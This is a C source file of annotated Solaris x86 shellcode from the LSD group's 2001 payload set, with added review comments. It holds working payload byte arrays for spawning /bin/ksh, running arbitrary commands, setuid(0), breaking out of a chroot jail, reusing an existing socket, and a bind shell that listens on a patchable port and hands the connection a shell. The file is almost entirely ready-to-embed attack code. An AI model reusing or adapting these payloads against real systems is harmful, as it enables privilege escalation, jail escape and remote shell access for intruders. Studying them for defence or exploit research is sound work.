/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for solaris 2.6 2.7 2.8 x86                                    #*/

/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
exec        x00b ret,->path="/bin/ksh",->[->a0=path,0]
exec        x00b ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 ret,uid=0
mkdir       x050 ret,->path="b..",mode= (any value is accepted)
chroot      x03d ret,->path={"b..","."}
chdir       x00c ret,->path=".."
ioctl       x036 ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
so_socket   x0e6 ret,AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1
bind        x0e8 ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
listen      x0e9 ret,sfd,backlog=5,vers= (not required in this syscall)
accept      x0ea ret,sfd,0,0,vers= (not required in this syscall)
fcntl       x03e ret,sfd,F_DUP2FD=0x09,fd={0,1,2}
*/

#if defined(X86) && defined(SOLARIS)

/*
 * Standalone exec("/bin/ksh") payload (table row "exec x00b", first form).
 * Unlike shellcode[] below it does not rely on %esi: after building argv it
 * writes the lcall syscall gate into its own body (the subl $0x3b lands %edi
 * back at offset 2), so it must execute from writable memory.
 * The "33+8" count excludes the NUL that terminates the C literal
 * (sizeof _shellcode == 42); none of the 41 payload bytes is 0x00.
 * NOTE(review): a file-scope identifier beginning with '_' is reserved by
 * the C standard; the name is kept unchanged because callers refer to it.
 */
char _shellcode[]=         /* 33+8 bytes                     */
    "\xeb\x1a"             /* jmp     <shellcode+28>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\x83\xef\x3b"         /* subl    $0x3b,%edi             */
    "\xb0\x9a"             /* movb    $0x9a,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xb0\x07"             /* movb    $0x07,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xe8\xe1\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

/*
 * Sets up the Solaris x86 system-call gate and leaves its address in %esi.
 * The 0xff bytes in the tail are fill: the stosl/stosb above zero them at
 * run time, turning the last eight bytes into "lcall $0x7,$0x0 ; ret".
 * Every fragment below that does "call *%esi" (shellcode[], cmdshellcode[],
 * setuidcode[], chrootcode[], findsckcode[], bindsckcode[]) assumes this
 * fragment ran first and that %esi has not been clobbered since.
 * Rewrites itself, so it must execute from writable memory.
 */
char syscallcode[]=        /* 26 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x09"             /* jmp     <syscallcode+13>       */
    "\x5f"                 /* popl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xaa"                 /* stosb   %al,%es:(%edi)         */
    "\x5e"                 /* popl    %esi                   */
    "\xeb\x0d"             /* jmp     <syscallcode+26>       */
    "\xe8\xf2\xff\xff\xff" /* call    <syscallcode+4>        */
    "\x9a\xff\xff\xff\xff" /* lcall opcode + 4 fill bytes (zeroed above) */
    "\x07\xff"             /* selector 0x0007 (low byte + fill, zeroed above) */
    "\xc3"                 /* ret                            */
;

/*
 * exec("/bin/ksh") through the gate left in %esi by syscallcode[] (table row
 * "exec x00b", first form).  The two-word argv array is stored 0x14 bytes
 * past the start of the path string, i.e. beyond the end of this array, so
 * the buffer this is copied into needs writable slack after the string.
 * "25+8" excludes the terminating NUL of the C literal.
 */
char shellcode[]=          /* 25+8 bytes                     */
    "\xeb\x12"             /* jmp     <shellcode+20>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xe9\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

/*
 * exec("/bin/ksh","-c",cmd) through %esi (table row "exec x00b", second
 * form).  The caller appends the command directly after "/bin/ksh -c " and
 * must NUL-terminate it; the only terminators written here are the two
 * movb %dl stores (after "ksh" at 0x8 and after "-c" at 0xb).  The four-word
 * argv array is stored 0x54 bytes below the string, i.e. 48 bytes before the
 * first byte of this fragment, so the memory preceding it must be writable.
 * Disassembly fixed: the disp8 0xac encodes -0x54, not -0x44.
 */
char cmdshellcode[]=       /* 36+12+cmdlen bytes             */
    "\xeb\x1d"             /* jmp     <cmdshellcode+31>      */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\xac"         /* leal    -0x54(%eax),%edi       */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x88\x50\x08"         /* movb    %dl,0x8(%eax)          */
    "\x88\x50\x0b"         /* movb    %dl,0xb(%eax)          */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x09"         /* leal    0x09(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x03"         /* leal    0x03(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xde\xff\xff\xff" /* call    <cmdshellcode+2>       */
    "/bin/ksh -c "
    /* command (appended by the caller, NUL-terminated) */
;

/* setuid(0) through the gate in %esi (table row "setuid x017"); the pushed
   zero is the uid argument. */
char setuidcode[]=         /* 7 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

/*
 * mkdir("b..") ; chroot("b..") ; 255 x chdir("..") ; chroot(".") -- the
 * mkdir/chroot/chdir rows of the table above, all through %esi.  The path
 * is pushed on the stack and terminated by the movb %al,0x3(%edi); the two
 * incl %edi steps then reuse its tail as ".." and ".".  The 0xff loaded
 * into %cl is the chdir repeat count consumed by the loop instruction.
 */
char chrootcode[]=         /* 40 bytes                       */
    "\x68""b..."           /* pushl   $0x2e2e2e62            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x88\x47\x03"         /* movb    %al,0x3(%edi)          */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x50"             /* movb    $0x50,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x47"                 /* incl    %edi                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xfa"             /* loop    <chrootcode+28>        */
    "\x47"                 /* incl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

/*
 * Finds the connected socket whose peer port equals the 16-bit value at
 * FINDSCKPORTOFS (the 0x1234 placeholder in "movw $0x1234,%bx") and moves
 * it onto fds 2,1,0 with fcntl(F_DUP2FD) -- the ioctl and fcntl rows of the
 * table above, all through %esi.  Descriptors are probed counting down from
 * the 0x0101 loaded into %cx, each with ioctl(TI_GETPEERNAME) into a
 * sockaddr buffer placed 0x7c bytes below %esi; the port is compared at
 * offset 2 of that buffer (the hi,lo position of the 0xff,2,hi,lo layout),
 * so callers store the patched port with its high byte first.
 */
char findsckcode[]=        /* 67 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\x8d\x4f\x10"         /* leal    0x10(%edi),%ecx        */
    "\xb0\x91"             /* movb    $0x91,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x95"                 /* xchgl   %eax,%ebp              */
    "\xb5\x54"             /* movb    $0x54,%ch              */
    "\x51"                 /* pushl   %ecx                   */
    "\x66\xb9\x01\x01"     /* movw    $0x0101,%cx            */
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x36"             /* movb    $0x36,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+47>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx  (port, patched at FINDSCKPORTOFS) */
    "\x66\x39\x5d\x02"     /* cmpw    %bx,0x2(%ebp)          */
    "\x74\x02"             /* je      <findsckcode+49>       */
    "\xe2\xe6"             /* loop    <findsckcode+23>       */
    "\x6a\x09"             /* pushb   $0x09                  */
    "\x51"                 /* pushl   %ecx                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x3e"             /* movb    $0x3e,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xf4"             /* loop    <findsckcode+55>       */
;

/*
 * so_socket(AF_INET,SOCK_STREAM) / bind / listen / accept on the port stored
 * at BINDSCKPORTOFS (the 0x12,0x34 bytes of the pushed sockaddr
 * 0xff,2,hi,lo), then move the accepted fd onto 2,1,0 with fcntl(F_DUP2FD);
 * follows the so_socket..fcntl rows of the table above, all through %esi.
 * The sockaddr lives on the stack (%edi points at it) and its second word
 * is zeroed by the movl %eax,0x4(%edi) before bind.
 * Disassembly fixed: the source operand of the movl at offset 7 is %esp.
 */
char bindsckcode[]=        /* 73 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff  (port bytes patched at BINDSCKPORTOFS) */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x40"                 /* incl    %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x48"                 /* decl    %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x02"             /* movb    $0x02,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xe6"             /* movb    $0xe6,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x89\x47\x04"         /* movl    %eax,0x4(%edi)         */
    "\x6a\x10"             /* pushb   $0x10                  */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xe8"             /* movb    $0xe8,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x6a\x05"             /* pushb   $0x05                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xe9"             /* movb    $0xe9,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xea"             /* movb    $0xea,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x6a\x09"             /* pushb   $0x09                  */
    "\x53"                 /* pushl   %ebx                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x3e"             /* movb    $0x3e,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xf4"             /* loop    <bindsckcode+61>       */
;

/* Two-instruction stub: returns to its caller with %eax holding the value of
   %esp at the ret, i.e. the address of the return slot being popped.  3 bytes
   plus the literal's terminating NUL. */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

/* Byte offsets of the 16-bit port placeholder (0x12,0x34 in the listings
   above) that callers overwrite before use: in findsckcode[] it is the
   immediate of "movw $0x1234,%bx", in bindsckcode[] the hi,lo bytes of the
   pushed sockaddr (0xff,2,hi,lo).  Both fragments compare/store the two
   bytes as they sit in memory, so the port goes in high byte first.
   NOTE(review): BINDSCKPORTOFS is written as an octal literal; 05 == 5. */
#define FINDSCKPORTOFS     39
#define BINDSCKPORTOFS     05

#endif
